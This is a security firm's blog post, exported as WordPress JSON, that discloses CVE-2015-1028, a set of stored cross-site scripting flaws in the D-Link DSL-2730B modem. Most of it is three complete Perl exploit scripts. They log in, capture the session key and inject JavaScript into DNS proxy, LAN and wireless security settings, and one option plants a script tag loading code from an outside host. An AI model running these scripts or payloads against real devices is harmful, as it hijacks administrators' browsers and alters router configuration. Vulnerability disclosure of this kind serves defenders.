{"id":339,"date":"2015-01-11T03:21:38","date_gmt":"2015-01-11T03:21:38","guid":{"rendered":"http:\/\/www.xlabs.com.br\/blog\/?p=339"},"modified":"2021-08-25T17:43:54","modified_gmt":"2021-08-25T20:43:54","slug":"cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored","status":"publish","type":"post","link":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/","title":{"rendered":"CVE-2015-1028 D-Link Modem DSL-2730B XSS Injection Stored"},"content":{"rendered":"<p>While analyzing the security of the D-Link DSL-2730B modem, we found several Cross-Site Scripting vulnerabilities, better known as XSS Injection. All of these flaws allow the modem to store malicious code, which can give rise to an external attack on the victim's network; in this case the most common victim would be the modem's administrator. This short article aims to present the exploit code for these flaws.<\/p>\n<h4><strong>Platform description according to the manufacturer's website<\/strong><\/h4>\n<p>The DSL-2730B, D-Link's ADSL broadband modem with integrated wireless router, is ideal for users who get their Internet connection through the telephone line. This router connects directly to the telephone line, without the need for an ADSL modem. Because it is also a wireless router, the DSL-2730B connects a group of users to the Internet, allowing computers in a home or office to share a high-speed ADSL 2\/2+ connection. It provides a wireless connection for computers and wireless devices. 
It has four Ethernet ports, firewall protection and QoS for efficient and secure downloads or uploads of photos, music files, videos and e-mail over the Internet.<\/p>\n<p><a href=\"http:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/01\/Index.jpg\"><img decoding=\"async\" class=\"alignnone wp-image-340\" src=\"http:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/01\/Index.jpg\" alt=\"Index\" width=\"724\" height=\"611\" srcset=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/01\/Index.jpg 835w, https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/01\/Index-300x253.jpg 300w\" sizes=\"(max-width: 724px) 100vw, 724px\" \/><\/a><\/p>\n<h4><strong>The security flaw<\/strong><\/h4>\n<p># Software: D-Link DSL-2730B<br \/>\n# Version: GE 1.01<br \/>\n# Company: D-Link<br \/>\n# Website: <a href=\"http:\/\/www.dlink.com\" target=\"_blank\" rel=\"noopener noreferrer\">www.dlink.com<\/a><br \/>\n# Vulnerability: Multiple Stored Cross-Site Scripting (XSS Injection Stored)<br \/>\n# CVE: CVE-2015-1028<br \/>\n# Author: Mauricio Corr\u00eaa<br \/>\n# POC: <a href=\"http:\/\/www.xlabs.com.br\/blog\/?p=362\" target=\"_blank\" rel=\"noopener noreferrer\">Video<\/a><\/p>\n<p><strong>dnsProxy.cmd exploit (DNS Proxy Configuration Panel)<\/strong><\/p>\n<pre class=\"lang:perl decode:true\" 
title=\"Exploit dnsProxy.cmd Stored XSS Injection\">#!\/usr\/bin\/perl\n#\n# Date dd-mm-aaaa: 11-11-2014\n# Exploit for D-Link DSL-2730B \n# Cross Site Scripting (XSS Injection) Stored in dnsProxy.cmd\n# Developed by Mauricio Corr\u00eaa\n# XLabs Information Security\n# WebSite: www.xlabs.com.br\n#\n# CAUTION!\n# This exploit enable some features of the modem,\n# forcing the administrator of the device, accessing the page to reconfigure the modem again,\n# occurring script execution in the browser of internal network users.\n#\n# Use with caution!\n# Use at your own risk!\n#\n\nuse strict;\nuse warnings;\nuse diagnostics;\nuse LWP::UserAgent;\nuse HTTP::Request;\nuse URI::Escape;\n\n\tmy $ip = $ARGV[0];\n\n\tmy $user = $ARGV[1];\n\n\tmy $pass = $ARGV[2];\n\t\t\n\n\n\t\tif (@ARGV != 3){\n\n\t\t\tprint \"\\n\";\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"Usage: perl $0 http:\\\/\\\/host_ip\\\/ user pass\\n\";\n\n\t\t}else{\n\n\t\t\t$ip = $1 if($ip=~\/(.*)\\\/$\/);\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"[+] Exploring $ip\\\/ ...\\n\";\n\n\t\t\tmy $payload = \"%27;alert(%27XLabsSec%27);\\\/\\\/\";\n\t\t\t\n\t\t\tmy $ua = new LWP::UserAgent;\n\n\t\t\tmy $hdrs = new HTTP::Headers( Accept =&gt; 'text\/plain', UserAgent =&gt; \"XLabs Security Exploit Browser\/1.0\" );\n\n\t\t\t$hdrs-&gt;authorization_basic($user, $pass);\n\t\t\t\n\t\t\tchomp($ip);\n\n\t\t\t\n\t\t\tprint \"[+] Preparing...\\n\";\n\t\t\t\n\t\t\tmy $url = 
\"$ip\/dnsProxy.cmd?enblDproxy=1&amp;hostname=Broadcom&amp;domainname=A\";\n\t\t\t\n\t\t\t\n\t\t\tmy $req = new HTTP::Request(\"GET\",$url,$hdrs);\n\n\t\t\tprint \"[+] Prepared!\\n\";\n\t\t\t\n\t\t\tprint \"[+] Requesting...\\n\";\n\t\t\t\n\t\t\tmy $resp = $ua-&gt;request($req);\n\n\t\t\tif ($resp-&gt;is_success){\n\n\t\t\tprint \"[+] Successfully Requested!\\n\";\n\n\t\t\tmy $resposta = $resp-&gt;as_string;\n\n\t\t\tprint \"[+] Obtain session key...\\n\";\n\t\t\t\n\t\t\tmy $token = \"\";\n\t\t\t\n\t\t\tif($resposta =~ \/sessionKey=(.*)\\';\/){\n\t\t\t\t$token = $1;\t\t\t\n\t\t\t\tprint \"[+] Session key found: $token\\n\";\n\t\t\t}else{\n\t\t\t\tprint \"[-] Session key not found!\\n\";\n\t\t\t\texit;\n\t\t\t}\n\t\t\t\n\t\t\t\tprint \"[+] Preparing exploit...\\n\";\n\t\t\t\n\t\t\t\tmy $url_and_xpl = \"$ip\/dnsProxy.cmd?enblDproxy=1&amp;hostname=Broadcom&amp;domainname=XSS$payload&amp;sessionKey=$token\";\n\t\t\t\n\t\t\t\t$req = new HTTP::Request(\"GET\",$url_and_xpl,$hdrs);\n\n\t\t\t\tprint \"[+] Prepared!\\n\";\n\t\t\t\t\n\t\t\t\tprint \"[+] Exploiting...\\n\";\n\t\t\t\t\n\t\t\t\tmy $resp2 = $ua-&gt;request($req);\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tif ($resp2-&gt;is_success){\n\n\t\t\t\tmy $resultado = $resp2-&gt;as_string;\n\t\t\t\t\n\t\t\t\t\t\t\tif(index($resultado, uri_unescape($payload)) != -1){\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tprint \"[+] Successfully Exploited!\";\n\n\t\t\t\t\t\t\t}else{\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tprint \"[-] Not Exploited!\";\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t}else {\n\n\t\t\tprint \"[-] Ops!\\n\";\n\t\t\tprint $resp-&gt;message;\n\n\t\t\t}\n\n\n}<\/pre>\n<p><strong>lancfg2get.cgi Exploit (Lan Configuration Panel)<\/strong><\/p>\n<pre class=\"lang:perl decode:true\" title=\"Exploit lancfg2get.cgi XSS Injection Stored\">#!\/usr\/bin\/perl\n#\n# Date dd-mm-aaaa: 11-11-2014\n# Exploit for D-Link DSL-2730B \n# Cross Site Scripting (XSS Injection) Stored in lancfg2get.cgi\n# Developed by Mauricio Corr\u00eaa\n# XLabs Information 
Security\n# WebSite: www.xlabs.com.br\n#\n# CAUTION!\n# This exploit disables some features of the modem,\n# forcing the administrator of the device, accessing the page to reconfigure the modem again,\n# occurring script execution in the browser of internal network users.\n#\n# Use with caution!\n# Use at your own risk!\n#\n\nuse strict;\nuse warnings;\nuse diagnostics;\nuse LWP::UserAgent;\nuse HTTP::Request;\nuse URI::Escape;\n\n\tmy $ip = $ARGV[0];\n\n\tmy $user = $ARGV[1];\n\n\tmy $pass = $ARGV[2];\n\t\t\n\t\n\n\t\tif (@ARGV != 3){\n\n\t\t\tprint \"\\n\";\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"Usage: perl $0 http:\\\/\\\/host_ip\\\/ user pass\\n\";\n\n\t\t}else{\n\n\t\t\t$ip = $1 if($ip=~\/(.*)\\\/$\/);\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"[+] Exploring $ip\\\/ ...\\n\";\n\n\t\t\tmy $payload = \"%27;alert(%27XLabsSec%27);\\\/\\\/\";\n\t\t\t\n\t\t\tmy $ua = new LWP::UserAgent;\n\n\t\t\tmy $hdrs = new HTTP::Headers( Accept =&gt; 'text\/plain', UserAgent =&gt; \"XLabs Security Exploit Browser\/1.0\" );\n\n\t\t\t$hdrs-&gt;authorization_basic($user, $pass);\n\t\t\t\n\t\t\tchomp($ip);\n\n\t\t\t\n\t\t\tprint \"[+] Preparing exploit...\\n\";\n\t\t\t\n\t\t\tmy $url_and_xpl = \"$ip\/lancfg2get.cgi?brName=$payload\";\n\t\t\t\t\t\t\n\t\t\tmy $req = new HTTP::Request(\"GET\",$url_and_xpl,$hdrs);\n\n\t\t\tprint \"[+] Prepared!\\n\";\n\t\t\t\n\t\t\tprint \"[+] Requesting and Exploiting...\\n\";\n\t\t\t\n\t\t\tmy $resp = $ua-&gt;request($req);\n\n\t\t\tif ($resp-&gt;is_success){\n\n\t\t\tprint \"[+] 
Successfully Requested!\\n\";\n\t\t\t\n\t\t\t\n\t\t\t\tmy $url = \"$ip\/lancfg2.html\";\n\t\t\t\n\t\t\t\t$req = new HTTP::Request(\"GET\",$url,$hdrs);\n\n\t\t\t\tprint \"[+] Checking that was explored...\\n\";\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tmy $resp2 = $ua-&gt;request($req);\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tif ($resp2-&gt;is_success){\n\n\t\t\t\tmy $resultado = $resp2-&gt;as_string;\n\t\t\t\t\n\t\t\t\t\t\t\tif(index($resultado, uri_unescape($payload)) != -1){\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tprint \"[+] Successfully Exploited!\";\n\n\t\t\t\t\t\t\t}else{\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tprint \"[-] Not Exploited!\";\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t}else {\n\n\t\t\tprint \"[-] Ops!\\n\";\n\t\t\tprint $resp-&gt;message;\n\n\t\t\t}\n\n\n}<\/pre>\n<p><strong>wlsecrefresh.wl &amp; wlsecurity.wl Exploit (Wireless Security Panel and Wireless Password Viewer)<\/strong><\/p>\n<pre class=\"lang:perl decode:true \" title=\"wlsecrefresh.wl &amp; wlsecurity.wl Exploit XSS Injection Stored\">#!\/usr\/bin\/perl\n#\n# Date dd-mm-aaaa: 11-11-2014\n# Exploit for D-Link DSL-2730B \n# Cross Site Scripting (XSS Injection) Stored in wlsecrefresh.wl\n# Developed by Mauricio Corr\u00eaa\n# XLabs Information Security\n# WebSite: www.xlabs.com.br\n#\n# CAUTION!\n# This exploit disables some features of the modem,\n# forcing the administrator of the device, accessing the page to reconfigure the modem again,\n# occurring script execution in the browser of internal network users.\n#\n# Use with caution!\n# Use at your own risk!\n#\n\nuse strict;\nuse warnings;\nuse diagnostics;\nuse LWP::UserAgent;\nuse HTTP::Request;\nuse URI::Escape;\n\n\t\n\tmy $ip = $ARGV[0];\n\n\tmy $user = $ARGV[1];\n\n\tmy $pass = $ARGV[2];\n\t\n\tmy $opt = $ARGV[3];\n\t\n\t\n\n\t\tif (@ARGV != 4){\n\n\t\t\tprint \"\\n\";\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\\n\";\n\t\t\tprint \"Developed by 
Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"Usage: perl $0 http:\\\/\\\/host_ip\\\/ user pass option\\n\";\n\t\t\tprint \"\\n\";\n\t\t\tprint \"Options: 1 - Parameter: wlAuthMode \\n\";\n\t\t\tprint \"\t 2 - Parameter: wl_wsc_reg \\n \";\n\t\t\tprint \"\t 3 - Parameter: wl_wsc_mode \\n\";\n\t\t\tprint \"\t 4 - Parameter: wlWpaPsk (Execute on click to exibe Wireless password) \\n\";\n\n\t\t}else{\n\n\t\t\t$ip = $1 if($ip=~\/(.*)\\\/$\/);\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"[+] Exploring $ip\\\/ ...\\n\";\n\n\t\t\tmy $payload = \"%27;alert(%27\\\/\\\/XLabsSec%27);\\\/\\\/\";\n\t\t\t\n\t\t\tmy $ua = new LWP::UserAgent;\n\n\t\t\tmy $hdrs = new HTTP::Headers( Accept =&gt; 'text\/plain', UserAgent =&gt; \"XLabs Security Exploit Browser\/1.0\" );\n\n\t\t\t$hdrs-&gt;authorization_basic($user, $pass);\n\t\t\t\n\t\t\tchomp($ip);\n\n\t\t\t\n\t\t\tprint \"[+] Preparing...\\n\";\n\t\t\t\n\t\t\tmy $url_and_payload = \"\";\n\t\t\t\n\t\t\tif($opt == 1){\n\t\t\t\t$url_and_payload = \"$ip\/wlsecrefresh.wl?wl_wsc_mode=disabled&amp;wl_wsc_reg=disabled&amp;wlAuth=0&amp;wlAuthMode=1$payload\".\n\t\t\t\t\t\t\t\t      \"&amp;wlKeyBit=0&amp;wlPreauth=0&amp;wlSsidIdx=0&amp;wlSyncNvram=1&amp;wlWep=disabled&amp;wlWpa=&amp;wsc_config_state=0\";\t\t\n\t\t\t}elsif($opt == 2){\n\t\t\t\t$url_and_payload = \"$ip\/wlsecrefresh.wl?wl_wsc_mode=disabled&amp;wl_wsc_reg=disabled$payload&amp;wlAuth=0&amp;wlAuthMode=997354\".\n\t\t\t\t\t\t\t\t\t  \"&amp;wlKeyBit=0&amp;wlPreauth=0&amp;wlSsidIdx=0&amp;wlSyncNvram=1&amp;wlWep=disabled&amp;wlWpa=&amp;wsc_config_state=0\";\n\t\t    }elsif($opt == 3){\n\t\t\t    $payload = \"%27;alert(%27\\\/\\\/XLabsSec%27);\\\/\\\/\";\n\t\t\t\t$url_and_payload = 
\"$ip\/wlsecrefresh.wl?wl_wsc_mode=disabled$payload&amp;wl_wsc_reg=disabled&amp;wlAuth=0&amp;wlAuthMode=997354\".\n\t\t\t\t\t\t\t\t\t  \"&amp;wlKeyBit=0&amp;wlPreauth=0&amp;wlSsidIdx=0&amp;wlSyncNvram=1&amp;wlWep=disabled&amp;wlWpa=&amp;wsc_config_state=0\";\n\t\t\t}elsif($opt == 4){\t\t\t\n\t\t\t\t$payload = \"GameOver%3Cscript%20src%3D%22http%3A%2f%2fxlabs.com.br%2fxssi.js%22%3E%3C%2fscript%3E\";\n\t\t\t\t$url_and_payload = \"$ip\/wlsecurity.wl?wl_wsc_mode=enabled&amp;wl_wsc_reg=disabled&amp;wsc_config_state=0&amp;wlAuthMode=psk%20psk2&amp;wlAuth=0&amp;\".\n\t\t\t\t\t\t\t\t   \"wlWpaPsk=$payload&amp;wlWpaGtkRekey=0&amp;wlNetReauth=36000&amp;wlWep=disabled&amp;wlWpa=aes&amp;wlKeyBit=0&amp;wlPreauth=0&amp;\".\n\t\t\t\t\t\t\t\t   \"wlSsidIdx=0&amp;wlSyncNvram=1\";\t\t\t\n\t\t\t}else{\t\t\t\t\n\t\t\t\tprint \"[-] Chose one option!\\n\";\n\t\t\t\texit;\t\t\t\n\t\t\t}\n\t\t\t\n\t\t\tmy $req = new HTTP::Request(\"GET\",$url_and_payload,$hdrs);\n\n\t\t\tprint \"[+] Prepared!\\n\";\n\t\t\t\n\t\t\tprint \"[+] Requesting...\\n\";\n\t\t\t\n\t\t\tmy $resp = $ua-&gt;request($req);\n\n\t\t\tif ($resp-&gt;is_success){\n\n\t\t\tprint \"[+] Successfully Requested!\\n\";\n\n\t\t\tmy $resposta = $resp-&gt;as_string;\n\n\t\t\tprint \"[+] Checking for properly explored...\\n\";\n\t\t\t\t\t\n\t\t\tmy $url = \"$ip\/wlsecurity.html\";\n\t\t\t\n\t\t\t$req = new HTTP::Request(\"GET\",$url,$hdrs);\n\n\t\t\tprint \"[+] Checking that was explored...\\n\";\n\t\t\t\t\n\t\t\t\t\n\t\t\tmy $resp2 = $ua-&gt;request($req);\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tif ($resp2-&gt;is_success){\n\t\t\t\t\n\t\t\t\t\tmy $result = $resp2-&gt;as_string;\n\t\t\t\t\t\n\t\t\t\t\tif($opt == 4){\n\t\t\t\t\t\t$payload = \"%27GameOver%3Cscript%20src%3D%5C%22http%3A%2f%2fxlabs.com.br%2fxssi.js%5C%22%3E%3C%2fscript%3E%27\";\n\t\t\t\t\t}\t\t\t\t\t\n\n\t\t\t\t\tif(index($result, uri_unescape($payload)) != -1){\n\t\t\t\t\t\t\t\t\n\t\t\t\t\tprint \"[+] Successfully Exploited!\";\n\n\t\t\t\t\t}else{\n\t\t\t\t\t\n\t\t\t\t\tprint 
\"[-] Not Exploited!\";\n\t\t\t\t\t\n\t\t\t\t\t}\n\n\t\t\t\t}\n\t\t\n\t\t\t}else {\n\n\t\t\tprint \"[-] Ops!\\n\";\n\t\t\tprint $resp-&gt;message;\n\n\t\t\t}\n\n\n}<\/pre>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":1589,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[61],"tags":[42,88,89,90],"_links":{"self":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/339"}],"collection":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/comments?post=339"}],"version-history":[{"count":29,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/339\/revisions"}],"predecessor-version":[{"id":1590,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/339\/revisions\/1590"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/media\/1589"}],"wp:attachment":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/media?parent=339"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/categories?post=339"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/tags?post=339"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}